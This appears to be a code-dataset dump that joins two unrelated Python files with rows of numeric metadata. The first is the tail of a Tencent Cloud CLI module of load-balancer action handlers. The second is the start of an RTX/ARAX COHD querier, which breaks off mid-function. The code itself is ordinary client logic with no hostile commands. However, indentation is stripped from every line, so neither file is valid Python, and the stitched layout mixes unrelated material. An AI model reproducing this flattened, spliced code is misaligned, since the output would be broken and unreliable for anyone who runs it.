model.from_json_string(json.dumps(args))
rsp = client.DescribeClassicalLBHealthStatus(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeregisterTargets(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DeregisterTargetsRequest()
model.from_json_string(json.dumps(args))
rsp = client.DeregisterTargets(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyLoadBalancerAttributes(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyLoadBalancerAttributesRequest()
model.from_json_string(json.dumps(args))
rsp = client.ModifyLoadBalancerAttributes(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCreateClsLogSet(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CreateClsLogSetRequest()
model.from_json_string(json.dumps(args))
rsp = client.CreateClsLogSet(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeClassicalLBByInstanceId(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeClassicalLBByInstanceIdRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeClassicalLBByInstanceId(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doReplaceCertForLoadBalancers(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ReplaceCertForLoadBalancersRequest()
model.from_json_string(json.dumps(args))
rsp = client.ReplaceCertForLoadBalancers(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyTargetGroupInstancesPort(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyTargetGroupInstancesPortRequest()
model.from_json_string(json.dumps(args))
rsp = client.ModifyTargetGroupInstancesPort(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doBatchModifyTargetWeight(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.BatchModifyTargetWeightRequest()
model.from_json_string(json.dumps(args))
rsp = client.BatchModifyTargetWeight(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeQuota(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeQuotaRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeQuota(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeTargetHealth(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeTargetHealthRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeTargetHealth(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doManualRewrite(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ManualRewriteRequest()
model.from_json_string(json.dumps(args))
rsp = client.ManualRewrite(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyTargetGroupInstancesWeight(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyTargetGroupInstancesWeightRequest()
model.from_json_string(json.dumps(args))
rsp = client.ModifyTargetGroupInstancesWeight(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCreateLoadBalancerSnatIps(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CreateLoadBalancerSnatIpsRequest()
model.from_json_string(json.dumps(args))
rsp = client.CreateLoadBalancerSnatIps(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
CLIENT_MAP = {
"v20180317": clb_client_v20180317,
}
MODELS_MAP = {
"v20180317": models_v20180317,
}
ACTION_MAP = {
"RegisterTargets": doRegisterTargets,
"SetLoadBalancerSecurityGroups": doSetLoadBalancerSecurityGroups,
"DescribeClassicalLBListeners": doDescribeClassicalLBListeners,
"DescribeCustomizedConfigAssociateList": doDescribeCustomizedConfigAssociateList,
"DescribeBlockIPTask": doDescribeBlockIPTask,
"CreateListener": doCreateListener,
"DeleteLoadBalancerSnatIps": doDeleteLoadBalancerSnatIps,
"DeleteListener": doDeleteListener,
"SetSecurityGroupForLoadbalancers": doSetSecurityGroupForLoadbalancers,
"BatchDeregisterTargets": doBatchDeregisterTargets,
"RegisterTargetGroupInstances": doRegisterTargetGroupInstances,
"CreateRule": doCreateRule,
"AutoRewrite": doAutoRewrite,
"DescribeLoadBalancerTraffic": doDescribeLoadBalancerTraffic,
"ModifyDomain": doModifyDomain,
"DeleteLoadBalancerListeners": doDeleteLoadBalancerListeners,
"DeleteTargetGroups": doDeleteTargetGroups,
"DeregisterTargetsFromClassicalLB": doDeregisterTargetsFromClassicalLB,
"CreateLoadBalancer": doCreateLoadBalancer,
"DescribeLoadBalancerListByCertId": doDescribeLoadBalancerListByCertId,
"ModifyListener": doModifyListener,
"DeleteLoadBalancer": doDeleteLoadBalancer,
"ModifyDomainAttributes": doModifyDomainAttributes,
"DisassociateTargetGroups": doDisassociateTargetGroups,
"DeleteRewrite": doDeleteRewrite,
"DescribeTargetGroupInstances": doDescribeTargetGroupInstances,
"AssociateTargetGroups": doAssociateTargetGroups,
"DescribeLoadBalancersDetail": doDescribeLoadBalancersDetail,
"DeregisterTargetGroupInstances": doDeregisterTargetGroupInstances,
"DescribeLoadBalancers": doDescribeLoadBalancers,
"DescribeBlockIPList": doDescribeBlockIPList,
"DescribeListeners": doDescribeListeners,
"DescribeClassicalLBTargets": doDescribeClassicalLBTargets,
"CreateTopic": doCreateTopic,
"BatchRegisterTargets": doBatchRegisterTargets,
"DescribeClsLogSet": doDescribeClsLogSet,
"DescribeCustomizedConfigList": doDescribeCustomizedConfigList,
"ModifyTargetWeight": doModifyTargetWeight,
"DescribeTaskStatus": doDescribeTaskStatus,
"DescribeTargetGroups": doDescribeTargetGroups,
"ModifyRule": doModifyRule,
"DeleteRule": doDeleteRule,
"SetLoadBalancerClsLog": doSetLoadBalancerClsLog,
"DescribeTargetGroupList": doDescribeTargetGroupList,
"ModifyBlockIPList": doModifyBlockIPList,
"CreateTargetGroup": doCreateTargetGroup,
"DescribeTargets": doDescribeTargets,
"DescribeRewrite": doDescribeRewrite,
"RegisterTargetsWithClassicalLB": doRegisterTargetsWithClassicalLB,
"ModifyTargetPort": doModifyTargetPort,
"ModifyTargetGroupAttribute": doModifyTargetGroupAttribute,
"DescribeClassicalLBHealthStatus": doDescribeClassicalLBHealthStatus,
"DeregisterTargets": doDeregisterTargets,
"ModifyLoadBalancerAttributes": doModifyLoadBalancerAttributes,
"CreateClsLogSet": doCreateClsLogSet,
"DescribeClassicalLBByInstanceId": doDescribeClassicalLBByInstanceId,
"ReplaceCertForLoadBalancers": doReplaceCertForLoadBalancers,
"ModifyTargetGroupInstancesPort": doModifyTargetGroupInstancesPort,
"BatchModifyTargetWeight": doBatchModifyTargetWeight,
"DescribeQuota": doDescribeQuota,
"DescribeTargetHealth": doDescribeTargetHealth,
"ManualRewrite": doManualRewrite,
"ModifyTargetGroupInstancesWeight": doModifyTargetGroupInstancesWeight,
"CreateLoadBalancerSnatIps": doCreateLoadBalancerSnatIps,
}
AVAILABLE_VERSION_LIST = [
"v20180317",
]
def action_caller():
return ACTION_MAP
def parse_global_arg(parsed_globals):
g_param = parsed_globals
is_exist_profile = True
if not parsed_globals["profile"]:
is_exist_profile = False
g_param["profile"] = "default"
configure_path = os.path.join(os.path.expanduser("~"), ".tccli")
is_conf_exist, conf_path = Utils.file_existed(configure_path, g_param["profile"] + ".configure")
is_cred_exist, cred_path = Utils.file_existed(configure_path, g_param["profile"] + ".credential")
conf = {}
cred = {}
if is_conf_exist:
conf = Utils.load_json_msg(conf_path)
if is_cred_exist:
cred = Utils.load_json_msg(cred_path)
if not (isinstance(conf, dict) and isinstance(cred, dict)):
raise ConfigurationError(
"file: %s or %s is not json format"
% (g_param["profile"] + ".configure", g_param["profile"] + ".credential"))
if OptionsDefine.Token not in cred:
cred[OptionsDefine.Token] = None
if not is_exist_profile:
if os.environ.get(OptionsDefine.ENV_SECRET_ID) and os.environ.get(OptionsDefine.ENV_SECRET_KEY):
cred[OptionsDefine.SecretId] = os.environ.get(OptionsDefine.ENV_SECRET_ID)
cred[OptionsDefine.SecretKey] = os.environ.get(OptionsDefine.ENV_SECRET_KEY)
cred[OptionsDefine.Token] = os.environ.get(OptionsDefine.ENV_TOKEN)
if os.environ.get(OptionsDefine.ENV_REGION):
conf[OptionsDefine.Region] = os.environ.get(OptionsDefine.ENV_REGION)
for param in g_param.keys():
if g_param[param] is None:
if param in [OptionsDefine.SecretKey, OptionsDefine.SecretId, OptionsDefine.Token]:
if param in cred:
g_param[param] = cred[param]
else:
raise ConfigurationError("%s is invalid" % param)
elif param in [OptionsDefine.Region, OptionsDefine.Output]:
if param in conf:
g_param[param] = conf[param]
else:
raise ConfigurationError("%s is invalid" % param)
try:
if g_param[OptionsDefine.ServiceVersion]:
g_param[OptionsDefine.Version] = "v" + g_param[OptionsDefine.ServiceVersion].replace('-', '')
else:
version = conf["clb"][OptionsDefine.Version]
g_param[OptionsDefine.Version] = "v" + version.replace('-', '')
if g_param[OptionsDefine.Endpoint] is None:
g_param[OptionsDefine.Endpoint] = conf["clb"][OptionsDefine.Endpoint]
except Exception as err:
raise ConfigurationError("config file:%s error, %s" % (conf_path, str(err)))
if g_param[OptionsDefine.Version] not in AVAILABLE_VERSION_LIST:
raise Exception("available versions: %s" % " ".join(AVAILABLE_VERSION_LIST))
return g_param
| 44.116904
| 105
| 0.731743
| 9,389
| 83,778
| 6.28821
| 0.03355
| 0.079878
| 0.228811
| 0.05769
| 0.842886
| 0.839888
| 0.838669
| 0.837449
| 0.835857
| 0.788025
| 0
| 0.008328
| 0.161522
| 83,778
| 1,898
| 106
| 44.140148
| 0.832147
| 0.00789
| 0
| 0.728248
| 0
| 0
| 0.04248
| 0.010512
| 0
| 0
| 0
| 0
| 0
| 1
| 0.039333
| false
| 0
| 0.007151
| 0.000596
| 0.047676
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0ce961bc34b1b7a0caaf7eeb8420e83fd7814f16
| 55,838
|
py
|
Python
|
code/ARAX/ARAXQuery/Expand/COHD_querier.py
|
rtx-travis-tester/RTX
|
4936eb0d368e3b40d9cdc988cc546a1eb73d0104
|
[
"MIT"
] | null | null | null |
code/ARAX/ARAXQuery/Expand/COHD_querier.py
|
rtx-travis-tester/RTX
|
4936eb0d368e3b40d9cdc988cc546a1eb73d0104
|
[
"MIT"
] | null | null | null |
code/ARAX/ARAXQuery/Expand/COHD_querier.py
|
rtx-travis-tester/RTX
|
4936eb0d368e3b40d9cdc988cc546a1eb73d0104
|
[
"MIT"
] | null | null | null |
#!/bin/env python3
import sys
import os
import traceback
import ast
import itertools
import numpy as np
from typing import List, Dict, Tuple
sys.path.append(os.path.dirname(os.path.abspath(__file__)))
import expand_utilities as eu
from expand_utilities import QGOrganizedKnowledgeGraph
sys.path.append(os.path.dirname(os.path.abspath(__file__))+"/../") # ARAXQuery directory
from ARAX_response import ARAXResponse
sys.path.append(os.path.dirname(os.path.abspath(__file__)) + "/../../../") # code directory
from RTXConfiguration import RTXConfiguration
sys.path.append(os.path.dirname(os.path.abspath(__file__)) + "/../../../UI/OpenAPI/python-flask-server/")
from openapi_server.models.node import Node
from openapi_server.models.edge import Edge
from openapi_server.models.attribute import Attribute
from openapi_server.models.query_graph import QueryGraph
from openapi_server.models.q_node import QNode
from openapi_server.models.q_edge import QEdge
sys.path.append(os.path.dirname(os.path.abspath(__file__)) + "/../../../ARAX/KnowledgeSources/COHD_local/scripts/")
from COHDIndex import COHDIndex
sys.path.append(os.path.dirname(os.path.abspath(__file__)) + "/../../../ARAX/NodeSynonymizer/")
from node_synonymizer import NodeSynonymizer
class COHDQuerier:
def __init__(self, response_object: ARAXResponse):
self.response = response_object
self.cohdindex = COHDIndex()
self.synonymizer = NodeSynonymizer()
def answer_one_hop_query(self, query_graph: QueryGraph) -> QGOrganizedKnowledgeGraph:
"""
This function answers a one-hop (single-edge) query using COHD database.
:param query_graph: A TRAPI query graph.
:return: An (almost) TRAPI knowledge graph containing all of the nodes and edges returned as
results for the query. (Organized by QG IDs.)
"""
# Set up the required parameters
log = self.response
self.count = 0
COHD_method = self.response.data['parameters']['COHD_method']
COHD_method_percentile = self.response.data['parameters']['COHD_method_percentile']
final_kg = QGOrganizedKnowledgeGraph()
# Switch QG back to old style where category/predicate can be strings OR lists
query_graph = eu.switch_back_to_str_or_list_types(query_graph)
if COHD_method_percentile == 99:
pass
elif type(COHD_method_percentile) is str:
try:
COHD_method_percentile = float(COHD_method_percentile)
if (COHD_method_percentile < 0) or (COHD_method_percentile > 100):
log.error("The 'COHD_method_percentile' in Expander should be between 0 and 100", error_code="ParameterError")
return final_kg
except ValueError:
log.error("The 'COHD_method_percentile' in Expander should be numeric", error_code="ParameterError")
return final_kg
else:
log.error("The 'COHD_method_percentile' in Expander should be an float", error_code="ParameterError")
return final_kg
# Verify this is a valid one-hop query graph
if len(query_graph.edges) != 1:
log.error(f"COHDQuerier.answer_one_hop_query() was passed a query graph that is not one-hop: {query_graph.to_dict()}", error_code="InvalidQuery")
return final_kg
# Run the actual query and process results
if COHD_method.lower() == 'paired_concept_freq':
final_kg = self._answer_query_using_COHD_paired_concept_freq(query_graph, COHD_method_percentile, log)
elif COHD_method.lower() == 'observed_expected_ratio':
final_kg = self._answer_query_using_COHD_observed_expected_ratio(query_graph, COHD_method_percentile, log)
elif COHD_method.lower() == 'chi_square':
final_kg = self._answer_query_using_COHD_chi_square(query_graph, COHD_method_percentile, log)
else:
log.error(f"The parameter 'COHD_method' was passed an invalid option. The current allowed options are `paired_concept_freq`, `observed_expected_ratio`, `chi_square`.", error_code="InvalidParameterOption")
return final_kg
def _answer_query_using_COHD_paired_concept_freq(self, query_graph: QueryGraph, COHD_method_percentile: float, log: ARAXResponse) -> Tuple[QGOrganizedKnowledgeGraph, Dict[str, Dict[str, str]]]:
qedge_key = next(qedge_key for qedge_key in query_graph.edges)
log.debug(f"Processing query results for edge {qedge_key} by using paired concept frequency")
final_kg = QGOrganizedKnowledgeGraph()
# if COHD_method_threshold == float("inf"):
# threshold = pow(10, -3.365) # default threshold based on the distribution of 0.99 quantile
# else:
# threshold = COHD_method_threshold
# log.info(f"The threshod used to filter paired concept frequency is {threshold}")
# extract information from the QueryGraph
qedge = query_graph.edges[qedge_key]
source_qnode_key = qedge.subject
target_qnode_key = qedge.object
source_qnode = query_graph.nodes[source_qnode_key]
target_qnode = query_graph.nodes[target_qnode_key]
# check if both ends of edge have no curie
if (source_qnode.id is None) and (target_qnode.id is None):
log.error(f"Both ends of edge {qedge_key} are None", error_code="BadEdge")
return final_kg
# Convert curie ids to OMOP ids
if source_qnode.id is not None:
source_qnode_omop_ids = self._get_omop_id_from_curies(source_qnode_key, query_graph, log)
else:
source_qnode_omop_ids = None
if log.status != 'OK':
return final_kg
if target_qnode.id is not None:
target_qnode_omop_ids = self._get_omop_id_from_curies(target_qnode_key, query_graph, log)
else:
target_qnode_omop_ids = None
if log.status != 'OK':
return final_kg
# expand edges according to the OMOP id pairs
if (source_qnode_omop_ids is None) and (target_qnode_omop_ids is None):
return final_kg
elif (source_qnode_omop_ids is not None) and (target_qnode_omop_ids is not None):
source_dict = dict()
target_dict = dict()
average_threshold = 0
count = 0
for (source_preferred_key, target_preferred_key) in itertools.product(list(source_qnode_omop_ids.keys()), list(target_qnode_omop_ids.keys())):
if source_qnode.category is None and target_qnode.category is None:
pass
else:
if self.synonymizer.get_canonical_curies(source_preferred_key)[source_preferred_key]['preferred_category'] == source_qnode.category:
pass
else:
continue
if self.synonymizer.get_canonical_curies(target_preferred_key)[target_preferred_key]['preferred_category'] == target_qnode.category:
pass
else:
continue
if len(source_qnode_omop_ids[source_preferred_key]) == 0:
log.warning(f"No OMOP concept id was found for source preferred id '{source_preferred_key}'' with qnode id '{qedge.subject}'")
continue
elif len(self.cohdindex.get_paired_concept_freq(concept_id_1=source_qnode_omop_ids[source_preferred_key], dataset_id=3)) == 0:
log.warning(f"No paired concept ids was found from COHD database for source preferred id '{source_preferred_key}'' with qnode id '{qedge.subject}'")
continue
else:
pass
if len(target_qnode_omop_ids[target_preferred_key]) == 0:
log.warning(f"No OMOP concept id was found for target preferred id '{target_preferred_key}'' with qnode id '{qedge.object}'")
continue
elif len(self.cohdindex.get_paired_concept_freq(concept_id_1=target_qnode_omop_ids[target_preferred_key], dataset_id=3)) == 0:
log.warning(f"No paired concept ids was found from COHD database for target preferred id '{target_preferred_key}'' with qnode id '{qedge.object}'")
continue
else:
pass
frequency = 0
threshold1 = np.percentile([row['concept_frequency'] for row in self.cohdindex.get_paired_concept_freq(concept_id_1=source_qnode_omop_ids[source_preferred_key], dataset_id=3) if row['concept_frequency'] != 0], COHD_method_percentile) # calculate the percentile after removing the extreme value e.g. 0
threshold2 = np.percentile([row['concept_frequency'] for row in self.cohdindex.get_paired_concept_freq(concept_id_1=target_qnode_omop_ids[target_preferred_key], dataset_id=3) if row['concept_frequency'] != 0], COHD_method_percentile) # calculate the percentile after removing the extreme value e.g. 0
threshold = min(threshold1, threshold2) # pick the minimum one for threshold
average_threshold = average_threshold + threshold
count = count + 1
omop_pairs = [f"{omop1}_{omop2}" for (omop1, omop2) in itertools.product(source_qnode_omop_ids[source_preferred_key], target_qnode_omop_ids[target_preferred_key])]
if len(omop_pairs) != 0:
res = self.cohdindex.get_paired_concept_freq(concept_id_pair=omop_pairs, dataset_id=3) # use the hierarchical dataset
if len(res) != 0:
maximum_concept_frequency = res[0]['concept_frequency'] # the result returned from get_paired_concept_freq was sorted by decreasing order
frequency = maximum_concept_frequency
value = frequency
if value >= threshold:
swagger_edge_key, swagger_edge = self._convert_to_swagger_edge(source_preferred_key, target_preferred_key, "paired_concept_frequency", value)
else:
continue
source_dict[source_preferred_key] = source_qnode_key
target_dict[target_preferred_key] = target_qnode_key
# Finally add the current edge to our answer knowledge graph
final_kg.add_edge(swagger_edge_key, swagger_edge, qedge_key)
# Add the nodes to our answer knowledge graph
if len(source_dict) != 0:
for source_preferred_key in source_dict:
swagger_node_key, swagger_node = self._convert_to_swagger_node(source_preferred_key)
final_kg.add_node(swagger_node_key, swagger_node, source_dict[source_preferred_key])
if len(target_dict) != 0:
for target_preferred_key in target_dict:
swagger_node_key, swagger_node = self._convert_to_swagger_node(target_preferred_key)
final_kg.add_node(swagger_node_key, swagger_node, target_dict[target_preferred_key])
if count != 0:
log.info(f"The average threshold based on {COHD_method_percentile}th percentile of paired concept frequency is {threshold/count}")
return final_kg
elif source_qnode_omop_ids is not None:
source_dict = dict()
target_dict = dict()
new_edge = dict()
average_threshold = 0
count = 0
for source_preferred_key in source_qnode_omop_ids:
if source_qnode.category is None:
pass
else:
if self.synonymizer.get_canonical_curies(source_preferred_key)[source_preferred_key]['preferred_category'] == source_qnode.category:
pass
else:
log.warning(f"The preferred type of source preferred id '{source_preferred_key}' can't match to the given source type '{source_qnode.category}''")
continue
if len(source_qnode_omop_ids[source_preferred_key]) == 0:
log.warning(f"No OMOP concept id was found for source preferred id '{source_preferred_key}'' with qnode id '{qedge.subject}'")
continue
elif len(self.cohdindex.get_paired_concept_freq(concept_id_1=source_qnode_omop_ids[source_preferred_key], dataset_id=3)) == 0:
log.warning(f"No paired concept frequency was found from COHD database for source preferred id '{source_preferred_key}'' with qnode id '{qedge.subject}'")
continue
else:
pass
new_edge[source_preferred_key] = dict()
threshold = np.percentile([row['concept_frequency'] for row in self.cohdindex.get_paired_concept_freq(concept_id_1=source_qnode_omop_ids[source_preferred_key], dataset_id=3) if row['concept_frequency'] != 0], COHD_method_percentile)
average_threshold = average_threshold + threshold
count = count + 1
freq_data_list = [row for row in self.cohdindex.get_paired_concept_freq(concept_id_1=source_qnode_omop_ids[source_preferred_key], dataset_id=3) if row['concept_frequency'] >= threshold]
for freq_data in freq_data_list:
if target_qnode.category is None:
preferred_target_list = self.cohdindex.get_curies_from_concept_id(freq_data['concept_id_2'])
else:
